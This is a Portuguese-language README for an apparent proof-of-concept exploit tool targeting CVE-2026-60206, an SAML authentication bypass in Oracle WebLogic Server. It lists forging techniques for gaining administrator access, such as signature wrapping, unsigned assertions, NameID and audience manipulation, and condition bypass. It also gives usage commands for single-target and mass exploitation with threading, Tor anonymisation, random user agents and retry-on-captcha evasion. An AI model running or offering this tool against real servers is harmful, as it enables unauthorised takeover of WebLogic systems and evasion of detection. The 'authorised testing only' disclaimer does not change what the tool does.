
Análise técnica e Prova de Conceito para CVE-2026-60206, uma vulnerabilidade crítica de bypass de autenticação SAML no Oracle WebLogic Server.
Este repositório fornece uma prova de conceito de exploração para CVE‑2026‑60206, uma vulnerabilidade crítica de bypass de autenticação na implementação SAML do Oracle WebLogic Server. A falha permite que um atacante remoto com privilégios baixos comprometa completamente o servidor forjando asserções SAML.
⚠️ Aviso: Esta ferramenta destina-se apenas a pesquisas e testes de segurança autorizados. Utilize-a apenas contra sistemas que possui ou para os quais tem permissão explícita para testar. Os autores não assumem qualquer responsabilidade por uso indevido.
CVE-2026-60206 afeta o componente Core do Oracle WebLogic Server. A vulnerabilidade decorre de um tratamento inadequado de autenticação na implementação do protocolo SAML. Múltiplos vetores de ataque — como XML Signature Wrapping (XSW), aceitação de asserção não assinada, manipulação de NameID e bypass de audiência/condições — permitem que um atacante se passe por utilizadores arbitrários (ex.: weblogic) e ganhe acesso administrativo.
Versões Afetadas:
O PoC implementa os seguintes vetores de ataque:
WantAssertionsSigned não estiver ativado).AudienceRestriction para ampliar o âmbito.NotBefore/NotOnOrAfter para ignorar verificações de validade.all, unsigned, xsw, nameid, audience, conditions, combo ou replay.-l).-r).httpx se instalado, caso contrário recorre a requests (HTTP/1.1).--save-payloads).-c / --check) – determinar rapidamente se um alvo é vulnerável (não exploratório).git clone https://github.com/Debajyoti0-0/CVE-2026-60206.git
cd CVE-2026-60206
pip install -r requirements.txt
Necessário: requests, urllib3
Opcional (melhora a funcionalidade):
httpx – para suporte a HTTP/2lxml – para análise SAML avançadasignxml, cryptography – para tratamento de assinaturas (não necessário para exploração)python CVE-2026-60206.py -t https://192.168.1.100:7002 --detect
python CVE-2026-60206.py -t https://192.168.1.100:7002 --mode all -u weblogic
python CVE-2026-60206.py -t https://192.168.1.100:7002 --mode combo -u admin
python CVE-2026-60206.py -l targets.txt -o results.json
python CVE-2026-60206.py -l targets.txt --exploit -o results.csv --threads 20
python CVE-2026-60206.py -t https://192.168.1.100:7002 --mode replay --replay-file captured.xml
python CVE-2026-60206.py -t https://192.168.1.100:7002 --tor --check-tor
python CVE-2026-60206.py -t https://192.168.1.100:7002 -r request.txt --method POST
python CVE-2026-60206.py -t https://192.168.1.100:7002 -c
| Bandeira | Descrição |
|---|---|
-h, --help | Mostrar mensagem de ajuda e sair. |
--proxy PROXY | URL do proxy (substituído por --tor se utilizado). |
--no-verify | Desativar verificação de certificado SSL. |
--cookie COOKIE | Cookie(s) de sessão (ex.: name=value; name2=value2). |
--auth AUTH | Credenciais de autenticação básica (USER:PASS). |
| Bandeira | Descrição |
|---|---|
-t, --target TARGET | URL de um único alvo (ex.: https://host:7002). |
-l, --list LIST | Ficheiro de lista de alvos para varredura em massa, ou URL único. |
-f, --file FILE | Alias para --list. |
| Bandeira | Descrição |
|---|---|
-r, --requestfile REQUESTFILE | Carregar requisição HTTP bruta a partir de ficheiro (substitui ataques SAML). |
--method METHOD | Método HTTP a usar (para requisição bruta ou requisição única; padrão: GET). |
--random-agent | Usar um User-Agent aleatório da lista interna. |
-A, --user-agent USER_AGENT | Valor personalizado do cabeçalho User-Agent. |
--tor | Usar rede de anonimato Tor (SOCKS5 por padrão). |
--tor-port TOR_PORT | Porta do proxy Tor (padrão: 9050). |
--tor-type {HTTP,SOCKS4,SOCKS5} | Tipo de proxy Tor (padrão: SOCKS5). |
--check-tor | Verificar se o Tor está a ser usado corretamente (sai com veredito). |
--delay DELAY | Atraso em segundos entre cada requisição. |
--timeout TIMEOUT | Timeout em segundos (padrão: 30). |
--retries RETRIES | Número de repetições em caso de timeout/erros (padrão: 3). |
--retry-on RETRY_ON | Repetir requisição se o conteúdo da resposta corresponder a uma regex (ex.: 'captcha'). |
-dr, --disable-redirects | Desativar seguimento de redirecionamentos HTTP. |